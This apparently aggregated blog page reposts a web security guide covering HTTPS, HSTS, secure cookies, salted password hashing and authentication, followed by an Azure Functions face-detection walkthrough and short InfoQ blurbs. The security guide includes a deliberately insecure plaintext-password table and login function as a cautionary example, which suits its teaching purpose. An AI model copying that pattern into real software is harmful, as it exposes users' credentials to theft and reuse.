browsers will refuse to load HTTP content referenced from a HTTPS resource, so it is
important to update existing resources and verify all resources can be accessed using HTTPS.
We don’t always have control over how content can be loaded from external systems, for
example from an ad network. This might require us to work with the owner of the external
system to adopt HTTPS, or it might even involve temporarily setting up a proxy to serve the
external content to our users over HTTPS until the external systems are updated.

Once HSTS is enabled, it cannot be disabled until the period specified in the header
elapses. It is advisable to make sure HTTPS is working for all content before enabling it for
your site. Removing a domain from the HSTS Preload List will take even longer. The decision
to add your website to the Preload List is not one that should be taken lightly.

Unfortunately, not all browsers in use today support HSTS. It cannot yet be counted on as
a guaranteed way to enforce a strict policy for all users, so it is important to continue to
redirect users from HTTP to HTTPS and employ the other protections mentioned in this article.
For details on browser support for HSTS, you can visit Can I
use.

Protect Cookies

Browsers have a built-in security feature to help avoid disclosure of a cookie containing
sensitive information. Setting the "secure" flag in a cookie will instruct a browser to only
send a cookie when using HTTPS. This is an important safeguard to make use of even when HSTS
is enabled.
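As a small illustration using Python's standard library, the flag is just an attribute on the Set-Cookie header; setting HttpOnly alongside it (which keeps the cookie out of reach of JavaScript) is a common companion measure:

```python
from http.cookies import SimpleCookie

def session_cookie_header(session_id):
    # Build a Set-Cookie value with the "secure" flag so the browser only
    # sends it over HTTPS; "httponly" hides it from client-side scripts.
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["secure"] = True
    cookie["session"]["httponly"] = True
    return cookie["session"].OutputString()
```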

Other Risks

There are some other risks to be mindful of that can result in accidental disclosure of
sensitive information despite using HTTPS.

It is dangerous to put sensitive data inside of a URL. Doing so presents a risk if the URL
is cached in browser history, not to mention if it is recorded in logs on the server side. In
addition, if the resource at the URL contains a link to an external site and the user clicks
through, the sensitive data will be disclosed in the Referer header.

In addition, sensitive data might still be cached in the client, or by intermediate proxies
if the client’s browser is configured to use them and allow them to inspect HTTPS traffic. For
ordinary users the contents of traffic will not be visible to a proxy, but a practice we’ve
seen often for enterprises is to install a custom CA on their employees’ systems so their
threat mitigation and compliance systems can monitor traffic. Consider using headers to
disable caching to reduce the risk of leaking data due to caching.
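A sketch of what such headers might look like; the exact directives depend on your needs, and Pragma is only included for legacy HTTP/1.0 intermediaries:

```python
# Response headers instructing browsers and intermediaries not to store
# a sensitive response.
NO_CACHE_HEADERS = {
    "Cache-Control": "no-store",
    "Pragma": "no-cache",  # legacy HTTP/1.0 intermediaries
}
```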

For a general list of best practices, the OWASP Transport Protection Layer Cheat Sheet contains
some valuable tips.

Verify Your Configuration

As a last step, you should verify your configuration. There is a helpful online tool for
that, too. You can visit SSL Labs’
SSL Server Test to perform a deep analysis of your
configuration and verify that nothing is misconfigured. Since the tool is updated as new
attacks are discovered and protocol updates are made, it is a good idea to run this every few
months.

In Summary

  • Use HTTPS for everything!
  • Use HSTS to enforce it
  • You will need a certificate from a trusted certificate authority if you plan to trust normal web browsers
  • Protect your private key
  • Use a configuration tool to help adopt a secure HTTPS configuration
  • Set the "secure" flag in cookies
  • Be mindful not to leak sensitive data in URLs
  • Verify your server configuration after enabling HTTPS and every few months thereafter

Hash and Salt Your Users’ Passwords

When developing applications, you need to do more than protect your assets from
attackers. You often need to protect your users from attackers, and even from themselves.

Living Dangerously

The most obvious way to implement password authentication is to store the username and
password in a table and do lookups against it. Don’t ever do this:

-- SQL
CREATE TABLE application_user (
  email_address VARCHAR(100) NOT NULL PRIMARY KEY,
  password VARCHAR(100) NOT NULL
)

# python
def login(conn, email, password):
  result = conn.cursor().execute(
    "SELECT * FROM application_user WHERE email_address = ? AND password = ?",
    [email, password])
  return result.fetchone() is not None

Does this work? Will it allow valid users in and keep unregistered users out?
Yes. But here’s why it’s a very, very bad idea:

The Risks

Insecure password storage creates risks from both insiders and outsiders.
In the former case, an insider such as an application developer or DBA who can
read the above application_user table now has access to the credentials of your
entire user base. One often overlooked risk is that your insiders can now
impersonate your users within your application. Even if that particular scenario
isn’t of great concern, storing your users’ credentials without appropriate
cryptographic protection introduces an entirely new class of attack vectors for
your user, completely unrelated to your application.

We might hope it’s otherwise, but the fact is that users reuse credentials. The
first time someone signs up for your site of captioned cat pictures using the
same email address and password that they use for their bank login, your
seemingly low-risk credentials database has become a vehicle for storing
financial credentials. If a rogue employee or an external hacker steals your
credentials data, they can use them for attempted logins to major bank sites
until they find the one person who made the mistake of using their credentials
with wackycatcaptions.org, and one of your user’s accounts is drained of funds and
you are, at least in part, responsible.

That leaves two choices: either store credentials safely or don’t store them at all.

I Can Hash Passwordz

If you went down the path of creating logins for your site, option two is probably
not available to you, so you are stuck with option one. So what is involved
in safely storing credentials?

Firstly, you never want to store the password itself, but rather store a hash of
the password. A cryptographic hashing algorithm is a one-way transformation from
an input to an output from which the original input is, for all practical purposes,
impossible to recover. More on that "practical purposes" phrase shortly. For example,
your password might be "littlegreenjedi". Applying Argon2 with the salt
"12345678" (more on salts later) and default command-line options, gives you the hex result
9b83665561e7ddf91b7fd0d4873894bbd5afd4ac58ca397826e11d5fb02082a1. Now you aren’t
storing the password at all, but rather this hash. In order to validate a user’s
password, you just apply the same hash algorithm to the password text they send,
and, if they match, you know the password is valid.

So we’re done, right? Well, not exactly. The problem now is that, assuming we don’t
vary the salt, every user with the password "littlegreenjedi" will have the same
hash in our database. Many people just re-use their same old password.
Lookup tables generated using the most commonly occurring passwords
and their variations can be used to efficiently reverse engineer hashed passwords.
If an attacker gets hold of your password store, they can simply cross-reference a
lookup table with your password hashes and are statistically likely to extract a
lot of credentials in a pretty short period of time.

The trick is to add a bit of unpredictability into the password hashes so they
cannot be easily reverse engineered. A salt, when properly generated, can provide
just that.

A Dash of Salt

A salt is some extra data that is added to the password before it is hashed so that
two instances of a given password do not have the same hash value. The real benefit
here is that it increases the range of possible hashes of a given password beyond
the point where it is practical to pre-compute them. Suddenly the hash of "littlegreenjedi"
can’t be predicted anymore. If we use the salt the string "BNY0LGUZWWIZ3BVP" and
then hash with Argon2 again, we get
67ddb83d85dc6f91b2e70878f333528d86674ecba1ae1c7aa5a94c7b4c6b2c52. On the other
hand, if we use "M3WIBNKBYVSJW4ZJ", we get
64e7d42fb1a19bcf0dc8a3533dd3766ba2d87fd7ab75eb7acb6c737593cef14e.
Now, if an attacker gets their hands on the password hash store, it is much more
expensive to brute force the passwords.
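The same behaviour can be demonstrated with a standard-library KDF. This sketch uses hashlib.scrypt (one of the slow functions discussed in a later section); the work-factor parameters are illustrative only, not a recommendation:

```python
import hashlib
import os

def hash_password(password, salt=None):
    # A fresh random salt per user makes precomputed lookup tables useless.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=2**14, r=8, p=1, maxmem=2**26)
    return salt, digest
```

Hashing the same password twice produces two different digests, because each call draws a new salt; supplying the stored salt reproduces the original digest for verification.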

The salt doesn’t require any special protection like encryption or obfuscation.
It can live alongside the hash, or even encoded with it, as is the case with bcrypt.
If your password table or file falls into attacker hands, access to the salt won’t
help them use a lookup table to mount an attack on the collection of hashes.

A salt should be globally unique per user. OWASP recommends 32 or 64-bit salt if
you can manage it, and NIST requires 128-bit at a minimum. A UUID will certainly
work; although probably overkill, it is generally easy to generate, if costly
to store. Hashing and salting is a good start, but as we will see below, even
this might not be enough.

Use A Hash That’s Worth Its Salt

Sadly, all hashing algorithms are not created equal. SHA-1 and MD5 had been common
standards for a long time until the discovery of a low cost collision attack. Luckily
there are plenty of alternatives that are low-collision, and slow. Yes, slow. A slower
algorithm means that a brute force attack is more time consuming and therefore costlier
to run.

The best widely-available algorithms are now considered to be scrypt and bcrypt.
Because contemporary SHA algorithms and PBKDF2 are less resistant to attacks where GPUs
are used, they are probably not great long-term strategies. A side note: technically
Argon2, scrypt, bcrypt and PBKDF2 are key derivation functions that use
key stretching
techniques, but for our purposes, we can think of them as a mechanism
for creating a hash.

Hash Algorithm   Use for passwords?
scrypt           Yes
bcrypt           Yes
SHA-1            No
SHA-2            No
MD5              No
PBKDF2           No
Argon2           Watch (see sidebar)

In addition to choosing an appropriate algorithm, you want to make sure you have it
configured correctly. Key derivation functions have configurable iteration counts,
also known as work factor, so that as hardware gets faster, you can
increase the time it takes to brute force them. OWASP provides recommendations
on functions and configuration in their
Password Storage Cheat Sheet.
If you want to make your application a bit more future-proof, you can add the
configuration parameters in the password storage, too, along with the hash and salt.
That way, if you decide to increase the work factor, you can do so without breaking
existing users or having to do a migration in one shot. By including the name of
the algorithm in storage, too, you could even support more than one at the same
time allowing you to evolve away from algorithms as they are deprecated in favor
of stronger ones.
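A sketch of what such self-describing storage could look like, again using stdlib scrypt with illustrative parameters; the field names here are assumptions, not a standard format:

```python
import hashlib
import os

def make_record(password, n=2**14, r=8, p=1):
    # Store the algorithm name and work-factor parameters beside the salt
    # and hash so they can be raised per-user later, without a migration.
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=n, r=r, p=p, maxmem=2**26)
    return {"alg": "scrypt", "n": n, "r": r, "p": p,
            "salt": salt.hex(), "hash": digest.hex()}

def verify(password, record):
    if record["alg"] != "scrypt":
        raise ValueError("unsupported algorithm")  # dispatch point for others
    digest = hashlib.scrypt(password.encode("utf-8"),
                            salt=bytes.fromhex(record["salt"]),
                            n=record["n"], r=record["r"], p=record["p"],
                            maxmem=2**26)
    return digest.hex() == record["hash"]
```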

Once More with Hashing

Really the only change to the code above is that rather than storing the password
in clear text, you are storing the salt, the hash, and the work factor. That means
when a user first chooses a password, you will want to generate a salt
and hash the password with it. Then, during a login attempt, you will use the salt
again to generate a hash to compare with the stored hash. As in:

CREATE TABLE application_user (
    email_address VARCHAR(100) NOT NULL PRIMARY KEY,
    hash_and_salt VARCHAR(60) NOT NULL
)

import bcrypt

def login(conn, email, password):
    result = conn.cursor().execute(
        "SELECT hash_and_salt FROM application_user WHERE email_address = ?",
        [email])
    user = result.fetchone()
    if user is not None:
        hashed = user[0].encode("utf-8")
        return is_hash_match(password, hashed)
    return False

def is_hash_match(password, hash_and_salt):
    # bcrypt encodes the algorithm, work factor and salt in the first
    # 29 characters of the hash
    salt = hash_and_salt[0:29]
    return hash_and_salt == bcrypt.hashpw(password.encode("utf-8"), salt)

The example above uses the python bcrypt library, which stores the salt and the work factor in the
hash for you. If you print out the results of hashpw(), you can see them
embedded in the string. Not all libraries work this way. Some output a raw hash,
without salt and work factor, requiring you to store them in addition to the hash.
But the result is the same: you use the salt with a work factor, derive the hash,
and make sure it matches the one that was originally generated when the password
was first created.

Final Tips

This might be obvious, but all the advice above is only for situations where you
are storing passwords for a service that you control. If you are storing passwords
on behalf of the user to access another system, your job is considerably more difficult.
Your best bet is to just not do it since you have no choice but to store the password
itself, rather than a hash. Ideally the third party will be able to support a much
more appropriate mechanism like SAML, OAuth or a similar mechanism for this situation.
If not, you need to think through very carefully how you store it, where you store it and
who has access to it. It’s a very complicated threat model, and hard to get right.

Many sites create unreasonable limits on how long your password can be. Even if
you hash and salt correctly, if your password length limit is too small, or the
allowed character set too narrow, you substantially reduce the number of possible
passwords and increase the probability that the password can be brute forced.
OWASP recommends a length of at least eight
from a set that includes alphanumeric and symbolic characters.
Wikipedia references
a Georgia Tech study recommending
twelve random characters. The goal, in the end, is not length but entropy; since
you can’t effectively enforce how your users generate their passwords,
the following would stand you in good stead:

  • Minimum 12 alpha-numeric and symbolic [1]
  • A long maximum like 100 characters. OWASP recommends capping it at most 160
    to avoid susceptibility to denial of service attacks resulting from passing in
    extremely long passwords. You’ll have to decide if that’s really a concern for
    your application
  • Provide your users with some kind of text recommending that, if at all possible, they:
    • use a password manager
    • randomly generate a long password, and
    • don’t reuse the password for another site
  • Don’t prevent the user from pasting passwords into the password field. It makes
    many password managers unusable
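If you surface a generator to help users follow that advice, Python's secrets module is the right tool (the random module is not suitable for security use). A minimal sketch:

```python
import secrets
import string

def generate_password(length=16):
    # Draw from letters, digits and symbols using a CSPRNG.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))
```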

If your security requirements are very stringent then you may want to think beyond
password strategy and look to mechanisms like two-factor authentication so you
aren’t over-reliant on passwords for security. Both
NIST and
Wikipedia have very detailed
explanations of the effects of character length and set limits on entropy. If you
are resource constrained, you can get quite specific about the cost of breaking
into your systems based on the speed of GPU clusters and keyspace, but for most
situations, this level of specificity just isn’t necessary to find an appropriate
password strategy.

In Summary

  • Hash and salt all passwords
  • Use an algorithm that is recognized as secure and sufficiently slow
  • Ideally, make your password storage mechanism configurable so it can evolve
  • Avoid storing passwords for external systems and services
  • Be careful not to set password size limits that are too small, or character
    set limits that are too narrow

Authenticate Users Safely

If we need to know the identity of our users, for example to control who receives specific content, we need to provide some form of authentication. If we want to retain information about a user between requests once they have authenticated, we will also need to support session management. Despite being well-known and supported by many full-featured frameworks, these two concerns are implemented incorrectly often enough that they have earned spot #2 in the OWASP Top 10.

Authentication is sometimes confused with authorization. Authentication confirms that a user is who they claim to be. For example, when you log into your bank, your bank can verify it is in fact you and not an attacker trying to steal the fortune you amassed selling your captioned cat pictures site. Authorization defines whether a user is allowed to do something. Your bank may use authorization to allow you to see your overdraft limit, but not allow you to change it. Session management ties authentication and authorization together. Session management makes it possible to relate requests made by a particular user. Without session management, users would have to authenticate during each request they sent to a web application. All three elements – authentication, authorization, and session management – apply to both human users and to services. Keeping these three separate in our software reduces complexity and therefore risk.

Figure 1

There are many methods of performing authentication. Regardless of which method you choose, it is always wise to try to find an existing, mature framework that provides the capabilities you need. Such frameworks have often been scrutinized over a long period of time and avoid many common mistakes. Helpfully, they often come with other useful features as well.

An overarching concern to consider from the start is how to ensure credentials remain private when a client sends them across the network. The easiest, and arguably only, way to achieve this is to follow our earlier advice to use HTTPS for everything.

One option is to use the simple challenge-response mechanism specified in the HTTP protocol for a client to authenticate to a server. When your browser encounters a 401 (Unauthorized) response that includes information about a challenge to access the resource, it will pop up a window prompting you to enter your name and password, keeping them in memory for subsequent requests. This mechanism has some weaknesses, the most serious being that the only way for a user to log out is to close their browser.

A safer option, which allows you to manage the lifecycle of a user’s session after authentication, is to have users enter credentials through a web form. This can be as simple as looking up a username in a database table and comparing the hash of a password using an approach we outlined in our earlier section on hashing passwords. For example, using Devise, a popular framework for Ruby on Rails, this can be done by registering a module for password authentication in the model used to represent a User, and instructing the framework to authenticate users before requests are processed by controllers.

# Register Devise’s database_authenticatable module in our User model to
# handle password authentication using bcrypt. We can optionally tune the work
# factor with the 'stretches' option.
class User < ActiveRecord::Base
  devise :database_authenticatable 
end

# Superclass to inherit from in controllers that require authentication
class AuthenticatedController < ApplicationController
  before_action :authenticate_user!
end

Understand Your Options

Although authenticating using a username and a password works well for many systems, it isn’t our only option. We can rely on external service providers where users may already have accounts to identify them. We can also authenticate users using a variety of different factors: something you know, such as a password or a PIN, something you have, such as your mobile phone or a key fob, and something you are, such as your fingerprints. Depending on your needs, some of these options may be worth considering, while others are helpful when we want to add an extra layer of protection.

One option that offers a convenience for many users is to allow them to log in using their existing account on popular services such as Facebook, Google, and Twitter, using a service called Single Sign-On (SSO). SSO allows users to log in to different systems using a single identity managed by an identity provider. For example, when visiting a website you may see a button that says “Sign in with Twitter” as an authentication option. To achieve this, SSO relies on the external service to manage logging the user in and to confirm their identity. The user never provides any credentials to our site.

SSO can significantly reduce the amount of time it takes to sign up for a site and eliminates the need for users to remember yet another username and password. However, some users may prefer to keep their use of our site private and not connect it to their identity elsewhere. Others may not have an existing account with the external providers we support. It is always preferable to allow users to register by manually entering their information as well.

A single factor of authentication such as a username and password is sometimes not enough to keep users safe. Using other factors of authentication can add an additional layer of security to protect users in the event a password is compromised. With Two-Factor Authentication (2FA), a second, different factor of authentication is required to confirm the identity of a user. If something the user knows, such as a username and password, is used as the first factor of authentication, a second factor could be something the user has, such as a secret code generated using software on their mobile phone or by a hardware token. Verifying a secret code sent to a user via SMS text message was once a popular way of doing this, but it is now deprecated due to presenting various risks. Applications like Google Authenticator and a multitude of other products and services can be safer and are relatively easy to implement, although any option will increase complexity of an application and should be considered mainly when applications maintain sensitive data.
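To make the second factor concrete: authenticator apps implement TOTP (RFC 6238), deriving a short-lived code from a shared secret and the current 30-second time window. A stdlib-only sketch, using the SHA-1, 6-digit defaults most apps ship with:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, timestamp=None, step=30, digits=6):
    # HMAC the current time-step counter with the shared secret, then
    # dynamically truncate the digest to a short numeric code.
    key = base64.b32decode(secret_b32, casefold=True)
    now = time.time() if timestamp is None else timestamp
    counter = struct.pack(">Q", int(now // step))
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)
```

The server stores the same secret and accepts a submitted code if it matches the current (and usually an adjacent) time window.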

Reauthenticate For Important Actions

Authentication isn’t only important when logging in. We can also use it to provide additional protection when users perform sensitive actions such as changing their password or transferring money. This can help limit the exposure in the event a user’s account is compromised. For example, some online merchants require you to re-enter details from your credit card when making a purchase to a newly-added shipping address. It is also helpful to require users to re-enter their passwords when updating their personal information.

Conceal Whether Users Exist

When a user makes a mistake entering their username or password, we might see a website respond with a message like this: The user ID is unknown. Revealing whether a user exists can help an attacker enumerate accounts on our system to mount further attacks against them or, depending on the nature of the site, revealing the user has an account may compromise their privacy. A better, more generic, response might be: Incorrect user ID or password.

This advice doesn’t just apply when logging in. Users can be enumerated through many other functions of a web application, for example when signing up for an account or resetting their password. It is good to be mindful of this risk and avoid disclosing unnecessary information. One alternative is to send an email with a link to continue their registration or a password reset link to a user after they enter their email address, instead of outputting a message indicating whether the account exists.
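In code, the fix is simply to collapse both failure cases into one response. A sketch, where find_user and check_password are hypothetical helpers standing in for your storage and hashing layers:

```python
GENERIC_ERROR = "Incorrect user ID or password."

def authenticate(find_user, check_password, email, password):
    # An unknown user and a wrong password produce the same message, so
    # the response can't be used to enumerate accounts.
    user = find_user(email)
    if user is None or not check_password(user, password):
        return False, GENERIC_ERROR
    return True, None
```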

Preventing Brute Force Attacks

An attacker might try to conduct a brute force attack to guess account passwords until they find one that works. With attackers increasingly using large networks of compromised systems, referred to as botnets, to conduct attacks, finding an effective solution to protect against this while not impacting service continuity is a challenging task. There are many options we can consider, some of which we’ll discuss below. As with most security decisions, each provides benefits but also comes with tradeoffs.

A good starting point that will slow an attacker down is to lock users out temporarily after a number of failed login attempts. This can help reduce the risk of an account being compromised, but it can also have the unintended effect of allowing an attacker to cause a denial-of-service condition by abusing it to lock users out. If the lockout requires an administrator to unlock accounts manually, it can cause a serious disruption to service. In addition, account lockout could be used by an attacker to determine whether accounts exist. Still, this will make things difficult for an attacker and will deter many. Using short lockouts of between 10 to 60 seconds can be an effective deterrent without imposing the same availability risks.
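A sketch of such a short lockout; the in-memory dict is an assumption for illustration (a real deployment would need shared storage such as a database or cache):

```python
import time

class LoginThrottle:
    # Lock an account out for a short window after repeated failures.
    def __init__(self, max_failures=5, lockout_seconds=30):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._failures = {}  # email -> (count, time of last failure)

    def is_locked(self, email, now=None):
        now = time.time() if now is None else now
        count, last = self._failures.get(email, (0, 0.0))
        return count >= self.max_failures and now - last < self.lockout_seconds

    def record_failure(self, email, now=None):
        now = time.time() if now is None else now
        count, _ = self._failures.get(email, (0, 0.0))
        self._failures[email] = (count + 1, now)

    def record_success(self, email):
        self._failures.pop(email, None)
```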

Another popular option is to use CAPTCHAs, which attempt to deter automated attacks by presenting a challenge that a human can solve but a computer can not. Oftentimes it seems as though they present challenges that can be solved by neither. These can be part of an effective strategy, but they have become decreasingly effective and face criticisms. Advancements have made it possible for computers to solve challenges with greater accuracy, and it has become inexpensive to hire human labor to solve them. They can also present problems for people with vision and hearing impairments, which is an important consideration if we want our site to be accessible.

Layering these options has been used as an effective strategy on sites that see frequent brute force attacks. After two login failures occur for an account, a CAPTCHA might be presented to the user. After several more failures, the account might be locked out temporarily. If that sequence of failures repeats again, it might make sense to lock the account once again, this time sending an email to the account owner requiring them to unlock the account using a secret link.

Don’t Use Default Or Hard-Coded Credentials

Shipping software with default credentials that are easy to guess presents a major risk for users and applications alike. It may seem like a convenience for users, but in reality this couldn’t be further from the truth. It is common to see this in embedded systems such as routers and IoT devices, which can become easy targets the moment they are connected to a network. Better options include generating a unique one-time password for each device and forcing the user to change it on first use, or preventing the software from being accessed externally until a password has been set.

Sometimes hard-coded credentials are added to applications for development and debugging purposes. This presents risks for the same reasons and might be forgotten about before the software ships. Worse, it may not be possible for the user to change or disable the credentials. We must never hard-code credentials in our software.

In Frameworks

Most web application frameworks include authentication implementations that support a variety of authentication schemes, and there are many other third party frameworks to choose from as well. As we stated earlier, it is preferable to try to find an existing, mature framework that suits your needs. Below are some examples to get you started.

  • Java: Apache Shiro, OACC
  • Spring: Spring Security
  • Ruby on Rails: Devise
  • ASP.NET: ASP.NET Core authentication, Built-in Authentication Providers
  • Play: play-silhouette
  • Node.js: Passport framework

In Summary

  • Use existing authentication frameworks whenever possible instead of creating one yourself
  • Support authentication methods that make sense for your needs
  • Limit the ability of an attacker to take control of an account
  • Take steps to detect and prevent attacks that aim to identify or compromise accounts
  • Never use default or hard-coded credentials

If you found this article useful, please share it. I appreciate the feedback and encouragement.

For articles on similar topics…

…take a look at the tag: clean code

from Martin Fowler http://ift.tt/2aUew67

What is Serverless Computing? Exploring Azure Functions

Filed under: Uncategorized — ketan @ 2:53 AM

There’s a lot of confusing terms in the Cloud space. And that’s not counting the term "Cloud." 😉

  • IaaS (Infrastructure as a Service) – Virtual Machines and stuff on demand.
  • PaaS (Platform as a Service) – You deploy your apps but try not to think about the Virtual Machines underneath. They exist, but we pretend they don’t until forced.
  • SaaS (Software as a Service) – Stuff like Office 365 and Gmail. You pay a subscription and you get email/whatever as a service. It Just Works.

"Serverless Computing" doesn’t really mean there’s no server. Serverless means there’s no server you need to worry about. That might sound like PaaS, but it’s higher level that than.

Serverless Computing is like this – Your code, a slider bar, and your credit card. You just have your function out there and it will scale as long as you can pay for it. It’s as close to "cloudy" as The Cloud can get.


With Platform as a Service, you might make a Node or C# app, check it into Git, deploy it to a Web Site/Application, and then you’ve got an endpoint. You might scale it up (get more CPU/Memory/Disk) or out (have 1, 2, n instances of the Web App) but it’s not seamless. It’s totally cool, to be clear, but you’re always aware of the servers.

New cloud systems like Amazon Lambda and Azure Functions have you upload some code and it’s running seconds later. You can have continuous jobs, functions that run on a triggered event, or make Web APIs or Webhooks that are just a function with a URL.

I’m going to see how quickly I can make a Web API with Serverless Computing.

I’ll go to http://ift.tt/1VqOHhk and make a new function. If you don’t have an account you can sign up free.

Getting started with Azure Functions

You can make a function in JavaScript or C#.

Getting started with Azure Functions - Create This Function

Once you’re into the Azure Function Editor, click "New Function" and you’ve got dozens of templates and code examples for things like:

  • Find a face in an image and store the rectangle of where the face is.
  • Run a function and comment on a GitHub issue when a GitHub webhook is triggered
  • Update a storage blob when an HTTP Request comes in
  • Load entities from a database or storage table

I figured I’d change the first example. It is a trigger that sees an image in storage, calls a cognitive services API to get the location of the face, then stores the data. I wanted to change it to:

  • Take an image as input from an HTTP Post
  • Draw a rectangle around the face
  • Return the new image

You can do this work from Git/GitHub but for easy stuff I’m literally doing it all in the browser. Here’s what it looks like.

Azure Functions can be done in the browser

I code and iterate and save and fail fast, fail often. Here’s the starter code I based it on. Remember that this is a starter function that runs on a triggered event, so note its Run()…I’m going to change this.

#r "Microsoft.WindowsAzure.Storage"
#r "Newtonsoft.Json"
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using Newtonsoft.Json;
using Microsoft.WindowsAzure.Storage.Table;
using System.IO; 
public static async Task Run(Stream image, string name, IAsyncCollector<FaceRectangle> outTable, TraceWriter log)
{
    string result = await CallVisionAPI(image); //STREAM
    log.Info(result); 
    if (String.IsNullOrEmpty(result))
    {
        return;
    }
    ImageData imageData = JsonConvert.DeserializeObject<ImageData>(result);
    foreach (Face face in imageData.Faces)
    {
        var faceRectangle = face.FaceRectangle;
        faceRectangle.RowKey = Guid.NewGuid().ToString();
        faceRectangle.PartitionKey = "Functions";
        faceRectangle.ImageFile = name + ".jpg";
        await outTable.AddAsync(faceRectangle); 
    }
}
static async Task<string> CallVisionAPI(Stream image)
{
    using (var client = new HttpClient())
    {
        var content = new StreamContent(image);
        var url = "http://ift.tt/2bnA8uZ";
        client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", Environment.GetEnvironmentVariable("Vision_API_Subscription_Key"));
        content.Headers.ContentType = new MediaTypeHeaderValue("application/octet-stream");
        var httpResponse = await client.PostAsync(url, content);
        if (httpResponse.StatusCode == HttpStatusCode.OK){
            return await httpResponse.Content.ReadAsStringAsync();
        }
    }
    return null;
}
public class ImageData {
    public List<Face> Faces { get; set; }
}
public class Face {
    public int Age { get; set; }
    public string Gender { get; set; }
    public FaceRectangle FaceRectangle { get; set; }
}
public class FaceRectangle : TableEntity {
    public string ImageFile { get; set; }
    public int Left { get; set; }
    public int Top { get; set; }
    public int Width { get; set; }
    public int Height { get; set; }
}

GOAL: I’ll change this Run() and make it listen for an HTTP request that contains an image, read the image that’s POSTed in (ya, I know, no validation), draw rectangles around detected faces, then return a new image.

public static async Task<HttpResponseMessage> Run(HttpRequestMessage req, TraceWriter log) {

var image = await req.Content.ReadAsStreamAsync();

As for the body of this function, I’m 20% sure I’m using too many MemoryStreams, but they are getting disposed, so take this code as an initial proof of concept. I DO need at least the two I have. I’m happy to chat with those who know more, but it’s more subtle than even I thought. Basically, I call out to the API and get back some face data that looks like this:

2016-08-26T23:59:26.741 {"requestId":"8be222ff-98cc-4019-8038-c22eeffa63ed","metadata":{"width":2808,"height":1872,"format":"Jpeg"},"faces":[{"age":41,"gender":"Male","faceRectangle":{"left":1059,"top":671,"width":466,"height":466}},{"age":41,"gender":"Male","faceRectangle":{"left":1916,"top":702,"width":448,"height":448}}]}

Then take that data and DRAW a Rectangle over the faces detected.

public static async Task<HttpResponseMessage> Run(HttpRequestMessage req, TraceWriter log)
{
    var image = await req.Content.ReadAsStreamAsync();
    MemoryStream mem = new MemoryStream();
    image.CopyTo(mem); //make a copy since one gets destroyed by the other API. Lame, I know.
    image.Position = 0;
    mem.Position = 0;
    
    string result = await CallVisionAPI(image); 
    log.Info(result); 
    if (String.IsNullOrEmpty(result)) {
        return req.CreateResponse(HttpStatusCode.BadRequest);
    }
    
    ImageData imageData = JsonConvert.DeserializeObject<ImageData>(result);
    MemoryStream outputStream = new MemoryStream();
    using(Image maybeFace = Image.FromStream(mem, true))
    {
        using (Graphics g = Graphics.FromImage(maybeFace))
        {
            Pen yellowPen = new Pen(Color.Yellow, 4);
            foreach (Face face in imageData.Faces)
            {
                var faceRectangle = face.FaceRectangle;
                g.DrawRectangle(yellowPen, 
                    faceRectangle.Left, faceRectangle.Top, 
                    faceRectangle.Width, faceRectangle.Height);
            }
        }
        maybeFace.Save(outputStream, ImageFormat.Jpeg);
    }
    
    var response = new HttpResponseMessage()
    {
        Content = new ByteArrayContent(outputStream.ToArray()),
        StatusCode = HttpStatusCode.OK,
    };
    response.Content.Headers.ContentType = new MediaTypeHeaderValue("image/jpeg");
    return response;
}

 

Now I go into Postman and POST an image to my new Azure Function endpoint. Here I uploaded a flattering picture of me and an unflattering picture of The Oatmeal. He’s pretty in real life just NOT HERE. 😉

Image Recognition with Azure Functions

So in just about 15 minutes, starting with no idea and armed with just my browser, Postman (also my browser), Google/StackOverflow, and Azure Functions, I’ve got a backend proof of concept.

Azure Functions supports Node.js, C#, F#, Python, PHP *and* Batch, Bash, and PowerShell, which really opens it up to basically anyone. You can use them for anything when you just want a function (or more) out there on the web. Send stuff to Slack, automate your house, update GitHub issues, act as a Webhook, etc. There’s some great third-party Azure Functions sample code in this GitHub repo as well. Inputs can be from basically anywhere and outputs can be basically anywhere. If those anywheres are also cloud services like Tables or Storage, you’ve got a "serverless backend" that is easy to scale.

I’m still learning, but I can see when I’d want a VM (total control) vs a Web App (near total control) vs a "Serverless" Azure Function (less control but I didn’t need it anyway, just wanted a function in the cloud.)


Sponsor: Aspose makes programming APIs for working with files, like: DOC, XLS, PPT, PDF and countless more.  Developers can use their products to create, convert, modify, or manage files in almost any way.  Aspose is a good company and they offer solid products.  Check them out, and download a free evaluation.


© 2016 Scott Hanselman. All rights reserved.

     

from Hanselman http://ift.tt/2bEOEin

August 23, 2016

Article: Growing Agile… Not Scaling!

Filed under: Uncategorized — ketan @ 11:44 PM

What makes an agile team successful is not the “process” nor the “tools” but rather the way people develop an effective level of interaction with each other. Growing agile means both focusing on culture, and on co-evolution of practices and tools.

By Andrea Tomasini & Dhaval Panchal

from InfoQ http://ift.tt/2a5brA7

Article: Working with Multiple Databases in Spring

Filed under: Uncategorized — ketan @ 9:39 PM

Accessing multiple databases in enterprise applications can be a challenge. With Spring it is easy enough to define a common data source, but once we introduce multiple data sources things get tricky. This article demos a technique for accessing multiple databases in Spring Boot applications easily and with minimum configuration.

By Aaron Jacobson

from InfoQ http://ift.tt/2aREQzl

Scaling Teams to Grow Effective Organizations

Filed under: Uncategorized — ketan @ 9:33 PM

When organizations are growing fast it can be a challenge to keep them sane and to achieve what you actually want to achieve by hiring more people: getting more done. Alexander Grosse talked about how you scale teams to build an effective organization at Spark the Change London 2016. He explored the five domains of scaling teams: Hiring, People Management, Organization, Culture, and Communication.

By Ben Linders

from InfoQ http://ift.tt/2ba3xKP

RGB LEDs: How to Master Gamma and Hue for Perfect Brightness

Filed under: Uncategorized — ketan @ 7:09 PM

